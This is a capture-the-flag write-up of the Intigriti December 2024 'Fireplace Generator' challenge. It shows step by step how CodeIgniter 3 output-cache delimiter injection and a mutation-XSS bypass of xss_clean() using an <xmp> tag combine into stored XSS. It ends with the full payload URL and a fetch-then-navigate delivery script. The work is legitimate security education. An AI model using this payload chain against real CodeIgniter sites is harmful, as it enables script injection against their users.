1224: Fireplace Generator

Writeup for the Intigriti December 2024 challenge 💥

Name

Authors

Challenge Description

Find the FLAG and win Intigriti swag! 🏆

Summary

Find the special ENDCI---> cache format delimiter to remove the start of the response until inside the id= attribute. This gets you out of the attribute
Bypass the xss_clean() function using a Mutation XSS with the allowed xmp tag: <xmp><p id='</xmp><style/onload=alert(origin)>'>

Official Writeup (by Jorian)

Visiting the challenge URL, we find a simple form with a single input to "generate a fireplace". The bottom right also shows a button to download the source code of the application.

We can try to input something and press "Ignite!", which takes us to a /view page with a ?title= parameter. The HTML source shows that our input ended up in two places, the main <h1> header and an id= attribute.

The source code allows us to run it locally making it easier to debug and understand the backend logic. After unzipping, we can start it with the following command:

docker compose up --build

Then, it should be accessible on http://localhost:8000. The source code leaves traces of "CodeIgniter", specifically version 3: https://github.com/bcit-ci/CodeIgniter The history of the source code was tracked by Git, so we can find what files were added or changed.

git diff HEAD --diff-filter=d

This reveals a small config change:

-$config['cache_query_string'] = FALSE;
+$config['cache_query_string'] = TRUE;

Along with with source code of application/controllers/View.php:

function str2id($str)
{
    if (strstr($str, '"')) {
        die('Error: No quotes allowed in attribute');
    }
    // Lowercase everything except first letters
    $str = preg_replace_callback('/(^)?[A-Z]+/', function($match) {
        return isset($match[1]) ? $match[0] : strtolower($match[0]);
    }, $str);
    // Replace whitespace with dash
    return preg_replace('/[\s]/', '-', $str);
}

class View extends CI_Controller
{
    public function index()
    {
        $this->load->helper('string');
        $this->load->helper('security');
        $this->output->cache(1);

        $title = $this->input->get('title') ?: 'Christmas Fireplace';

        $title = xss_clean($title);
        $id = str2id($title);

        $this->load->view('view', array(
            "id" => $id,
            "title" => $title
        ));
    }
}

This renders a template named view, found in application/views/view.php:

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link rel="stylesheet" href="/style.css" />
    </head>

    <body background="#483741" class="fire-border">
        <a href="/" class="top-left">⬅ Go back</a>
        <div class="wrapper">
            <h1><?= htmlspecialchars($title) ?></h1>
            ...
            <div class="fireplace" id="<?= $id ?>">
                <div class="bottom">...</div>
            </div>
        </div>
    </body>
</html>

From this, we can gather that we have one input, the title= query parameter. The xss_clean() function transforms our input, and then an ID is made of the string using the custom str2id() function. Finally, the $title variable is displayed safely using htmlspecialchars() while the $id variable is not escaped. However, we cannot use a quote (") character to break out of the id= attribute because of the strstr($str, '"') check.

We can quickly check what happens if our input contains the special < and > characters:

http://localhost:8000/index.php/view?title=%3Cu%3Etest

<!DOCTYPE html><html lang="en">...
<h1>&lt;u&gt;test</h1>...<div class="fireplace" id="<u>test">...</body></html>

Clearly, the $title variable was HTML-encoded, but the $id variable is output without encoding and still shows the raw <> characters. We cannot yet escape the attribute due to " being blocked, but it is something to keep in mind.

Caching

You may also notice the line $this->output->cache(1);. Combined with the change to the caching configuration this may be interesting. This code is documented here and implemented in system/core/Output.php. The _display_cache() function defined in there is called for every request. The code can be summarized as follows:

public function _display_cache(&$CFG, &$URI) {
    ...
    $filepath = $cache_path.md5($uri);
    if ( ! file_exists($filepath) OR ! $fp = @fopen($filepath, 'rb')) {
        return FALSE;
    }

    flock($fp, LOCK_SH);
    $cache = (filesize($filepath) > 0) ? fread($fp, filesize($filepath)) : '';
    flock($fp, LOCK_UN);
    fclose($fp);

    // Look for embedded serialized file info.
    if ( ! preg_match('/^(.*)ENDCI--->/', $cache, $match)) {
        return FALSE;
    }

    $cache_info = unserialize($match[1]);
    $expire = $cache_info['expire'];
    ...

    // Display the cache
    $this->_display(self::substr($cache, self::strlen($match[0])));
    return TRUE;
}

First, it calculates a cache path from the current URI, which in our case is the path and query parameters. If this path doesn't exist, the request isn't cached and it generates a new response like normal. If the file does exist, it is read and then uses a RegEx for /^(.*)ENDCI--->/ to find a separator between serialized cache info and the response data itself.

We can find these files locally by entering the Docker container after having generated a /view response:

$ docker compose exec -it web bash

root@06c66a7cc410:/var/www/html# cd application/cache
root@06c66a7cc410:/var/www/html/application/cache# ls -l
total 4
-rw-r----- 1 www-data www-data 1999 Nov 24 19:42 301b4f7c17e8d246d49e42ac03a32503
root@06c66a7cc410:/var/www/html/application/cache# cat 301b4f7c17e8d246d49e42ac03a32503

a:2:{s:6:"expire";i:1732477403;s:7:"headers";a:0:{}}ENDCI---><!DOCTYPE html><html lang="en">...
<h1>YOUR INPUT</h1>...<div class="fireplace" id="YOUR-INPUT">...</body></html>

So there is a special delimiter as ENDCI---> that separates the serialized cache info from the HTML body. This HTML body contains our input, and so does this cache file, in plain text. What if we put the string "ENDCI--->" in our input, will it get confused and use our delimiter?

http://localhost:8000/index.php/view?title=ENDCI---%3E

<!DOCTYPE html><html lang="en">...
<h1>ENDCI---&amp;gt;</h1>...<div class="fireplace" id="ENDCI---&gt;">...</body></html>

For some reason, it is double-encoded now, while previously the <> characters worked fine. After some investigating, we can find the root cause is in the xss_clean() function. It contains an array of $_never_allowed_str here including a mapping from --> to -->. Our input includes this so it is replaced. The function _do_never_allowed() is called right before returning and ensures that these strings are always replaced before returning the "safe" content.

In our case, this is not the final string being output, because $id is put through the str2id() function after xss_clean(). Conveniently, the str2id() function replaces all spaces with dashes (-), and the input we want to smuggle through contains dashes. This means we can replace the dashes in ENDCI---> with spaces like ENDCI >, which the XSS filter won't recognize anymore put the replacement will transform it into ENDCI---> again:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E

<!DOCTYPE html><html lang="en">...
<h1>ENDCI   &gt;</h1>...<div class="fireplace" id="ENDCI--->">...</body></html>

This seems to have worked. The file is generated and its cache entry now looks like this:

a:2:{s:6:"expire";i:1732478903;s:7:"headers";a:0:{}}ENDCI---><!DOCTYPE html><html lang="en">...
<h1>ENDCI   &gt;</h1>...<div class="fireplace" id="ENDCI--->">...</body></html>

Now there are two ENDCI---> delimiters, so which will the preg_match() match? We can quickly find out by force-reloading the page:

We certainly seem to have broken the page. Checking the source code shows not much is left of our payload:

"><div class="bottom">...</body></html>

So what happened? Regular Expressions are "greedy" by default meaning they try to match as long of a string as possible. The .* will then look past the first ENDCI---> to find a second in our payload and use that because it generates a longer match. Note that . matches all characters, except newlines because the PCRE_DOTALL (s) flag was not given. In our case, the views are minimized to not contain newlines so we can inject our payload into the first line. The PHP unserialize() function also received some garbage after its serialized object, but luckily the } end marker stops its parsing and it won't care about the HTML body after it.

This means we can now throw out the whole start of the HTML body, including opening the attribute. We are now in HTML context and can directly write HTML:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cu%3Etest

<u>test">...</u>

If we try to write an XSS payload now, however, we can see that it is still sanitized by xss_clean():

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cimg%20src%20onerror=alert(origin)%3E

<img />">...

xss_clean() bypass

Now that we can directly write HTML, we should take a look at the xss_clean() function and see how it blocks malicious inputs. Reading the code, we can see that it performs a few steps:

Remove control characters
URL-decode and HTML-decode recursively
Remove 'never allowed' strings from $_never_allowed_str and $_never_allowed_regex
HTML-encode <? and ?> tags
Remove spaces between certain words like "javascript" or "alert"
Remove javascript: protocol from a and img tags, and remove "script" and "xss" strings
Parse string as HTML with tags and attributes with RegEx. _sanitize_naughty_html() handles removing dangerous tags and attributes.
HTML-encode function calls like alert() to alert()
Remove 'never allowed' strings again

These are quite some layers to get through, but the main hurdle is step 7 where dangerous tags and attributes are removed. The list seems quite comprehensive so we cannot just come up with a unique XSS payload.

One thing to notice is that the string is parsed into HTML tags and attributes using a Regular Expression. There is a funny answer on StackOverflow explaining that it is impossible to parse HTML with RegEx. In this case, the RegEx is a complicated combination of a few parts:

$pattern = '#'
    .'<((?<slash>/*\s*)((?<tagName>[a-z0-9]+)(?=[^a-z0-9]|$)|.+)' // tag start and name, followed by a non-tag character
    .'[^\s\042\047a-z0-9>/=]*' // a valid attribute character immediately after the tag would count as a separator
    // optional attributes
    .'(?<attributes>(?:[\s\042\047/=]*' // non-attribute characters, excluding > (tag close) for obvious reasons
    .'[^\s\042\047>/=]+' // attribute characters
    // optional attribute-value
        .'(?:\s*=' // attribute-value separator
            .'(?:[^\s\042\047=><`]+|\s*\042[^\042]*\042|\s*\047[^\047]*\047|\s*(?U:[^\s\042\047=><`]*))' // single, double or non-quoted value
        .')?' // end optional attribute-value group
    .')*)' // end optional attributes group
    .'[^>]*)(?<closeTag>\>)?#isS';

It reads an opening <, then a tag name, followed by attributes, and finally >. This assumes the whole string is in HTML context, but if you have some experience with Mutation XSS, you may know that there are different contexts inside specific tags. The <title> tag, for example, contains not HTML but Text. That means HTML like the following will close the title tag in what looks to us like an attribute, and open the <img> tag:

<title><p id="</title><img src onerror="alert()" />">

Dom-Explorer

The RegEx that xss_clean() uses would see this as just a <title> tag and a <p> tag with an attribute, it would not find the <img> tag. Unfortunately, the title tag specifically is part of the $naughty_tags list that are removed. But more tags get parsed as text, such as:

style, script, xmp, iframe, noembed, noframes, plaintext, noscript, title and textarea

Comparing this with the list of denied tags, we can find a few that are not blocked:

>>> denied = {'blink', 'area', 'input', 'isindex', 'select', 'form', 'bgsound', 'expression', 'layer', 'iframe', 'behavior', 'style', 'audio', 'body', 'applet', 'object', 'xss', 'button', 'embed', 'html', 'math', 'video', 'base', 'confirm', 'plaintext', 'basefont', 'frame', 'xml', 'head', 'script', 'keygen', 'textarea', 'prompt', 'link', 'title', 'meta', 'svg', 'ilayer', 'alert', 'frameset'}
>>> working = {'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext', 'noscript', 'title', 'textarea'}

>>> working - denied
{'xmp', 'noembed', 'noscript', 'noframes'}

We can use any of these like <xmp> in our payload to confuse the parser. By writing a tag-looking string inside of the xmp content we can hide a closing </xmp> tag inside its attribute and then immediately start an arbitrary tag for XSS.

<xmp><p id="</xmp><style onload=alert(origin)">

Note that we still cannot use double quote (") characters, so we should use a single quote (') to open the attribute. Then we also can't use spaces in the eventual XSS payload because str2id() replaces them, so we can use / as an alternative attribute separator. Combined with the ENDCI---> prefix we had to be able to write HTML, our final payload becomes:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cxmp%3E%3Cp%20id=%27%3C/xmp%3E%3Cstyle/onload=alert(origin)%3E%27%3E

ENDCI   ><xmp><p id='</xmp><style/onload=alert(origin)>'>

The response to this request after the 2nd reload is:

<xmp><p-id='</xmp><style/onload=alert&#40;origin&#41;>'>">...

Even though the alert() call is HTML-encoded, it is put into an attribute that makes the browser decode it for us! This triggers the XSS:

Final Payload

To consistently deliver this payload to a victim, we need to cache the URL server-side before visiting it, but make sure it is not cached client-side because then another request wouldn't be sent. We can achieve this through a simple cross-origin fetch() to the URL before navigating the full page to it:

<script>
    const HOST = "http://localhost:8000";

    const payload = `ENDCI   ><xmp><p id='</xmp><style/onload=alert(origin)>'>`;
    const url = HOST + "/index.php/view?" + new URLSearchParams({ title: payload });

    (async () => {
        // Cache it on the server-side, not client-side
        await fetch(url, {
            mode: "no-cors",
        });
        // Then visit the page
        location = url;
    })();
</script>

Community Writeups

Previous0125: Particle Generator Next1124: 1337UP LIVE CTF

Last updated 7 months ago